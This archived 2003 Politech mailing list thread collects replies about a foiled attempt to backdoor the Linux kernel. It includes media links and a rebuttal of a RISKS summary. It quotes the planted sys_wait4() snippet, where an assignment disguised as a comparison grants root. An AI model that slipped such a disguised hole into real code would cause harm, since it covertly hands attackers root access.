Politech mailing list archives
Responses to attempt to put backdoor in Linux kernel
From: Declan McCullagh <declan () well com>
Date: Thu, 13 Nov 2003 00:36:55 -0500
--- Date: Wed, 12 Nov 2003 17:45:22 -0500 To: Declan McCullagh <declan () well com> From: "Robert E. Jones, III" <rjones () robjob com> Subject: Re: [Politech] How a backdoor in the Linux kernel was thwarted, from RISKS In-Reply-To: <6.0.0.22.2.20031112153041.021dbdb0 () mail well com>Declan - Long time politech member but only the second time I have written about an article.
Not to nit-pick on an otherwise fine email, but the poster is somewhat wrong in that at least News.com picked up on the story http://news.com.com/2100-7355-5103670.html I consider News.com to be fairly "mainstream" even if not one of the larger news organizations.
Of course, Slashdot picked up on it and frankly, if you go just on sheer number of hits, Slashdot is about as mainstream as it gets. http://slashdot.org/articles/03/11/06/058249.shtml?tid=106&tid=185
Thanks Rob Jones --- To: Declan McCullagh <declan () well com> Subject: Re: [Politech] How a backdoor in the Linux kernel was thwarted, from RISKS In-Reply-To: <6.0.0.22.2.20031112153041.021dbdb0 () mail well com> (Declan McCullagh's message of "Wed, 12 Nov 2003 15:31:04 -0500") From: Russ Allbery <rra () stanford edu> Organization: The Eyrie Date: Wed, 12 Nov 2003 15:11:49 -0800 Declan McCullagh <declan () well com> writes: > Date: Tue, 11 Nov 2003 09:21:16 -0600 > From: "Douglas W. Jones" <jones () cs uiowa edu> > Subject: Thwarted Linux backdoor > On 5 Nov 2003, an attempt to insert a very cleverly crafted backdoor > into Linux was averted. This is a really good example of the subtle > kinds of hacks a source code examiner must be waiting to catch if we > want genuinely secure voting systems under the current model of > proprietary DRE systems with a closed-door source code examination. > Someone broke into a server at kernel.kbits.net and inserted the > following code into the Linux kernel: > if ((options == (__WCLONE|__WALL)) && (current->uid = 0)) > retval = -EINVAL; > This was done in the code sys_wait4(). Larry McVoy caught the fact that > the change had been made, and was annoyed because it wasn't logged > properly. Matthew Dharm asked "Out of curiosity, what were the changed > lines." Zwane Mwaikambo responded "That looks odd", and Andries Brouwer > responded "Not if you hope to get root." Wow, that's a bunch of nonsense. The code in question was injected into a read-only export of the kernel as a CVS tree, which is only there for the convenience of CVS users. It is used only for reference, not to do active kernel development, and no releases are done from that tree. In other words, there's really no credible path whereby this code could have gotten into an actual release of Linux. The bug was never introduced into the actual working kernel source as the above implies. Larry McVoy was not annoyed that it wasn't logged properly; he was investigating why there was code in the read-only CVS export which wasn't actually in the main kernel repository. The person writing up this problem for RISKS clearly didn't actually understand it. -- Russ Allbery (rra () stanford edu) <http://www.eyrie.org/~eagle/> --- Date: Wed, 12 Nov 2003 18:01:41 -0300 From: Claudio GutiƩrrez <gutierrezclaudio () terra cl>User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.5) Gecko/20031013 Thunderbird/0.3
X-Accept-Language: en-us, en MIME-Version: 1.0 To: Declan McCullagh <declan () well com>Subject: Re: [Politech] How a backdoor in the Linux kernel was thwarted, from
This attack has only made the mainstream media in one place, so far:
http://www.smh.com.au/articles/2003/11/07/1068013371170.html
Bid to backdoor Linux kernel detected - smh.com.au
This is a pity, because I think this story is really important.
The attack was also reported on MSNBC, InfoWorld, The Register, Computerworld and SecurityFocus
http://www.msnbc.com/news/990343.asp?cp1=1 http://www.infoworld.com/article/03/11/07/HNlinuxattack_1.html http://www.theregister.co.uk/content/55/33855.html http://www.computerworld.com/softwaretopics/os/linux/story/0,10801,86946,00.html http://www.securityfocus.com/news/7388 _______________________________________________ Politech mailing list Archived at http://www.politechbot.com/ Moderated by Declan McCullagh (http://www.mccullagh.org/)
Current thread:
- Responses to attempt to put backdoor in Linux kernel Declan McCullagh (Nov 12)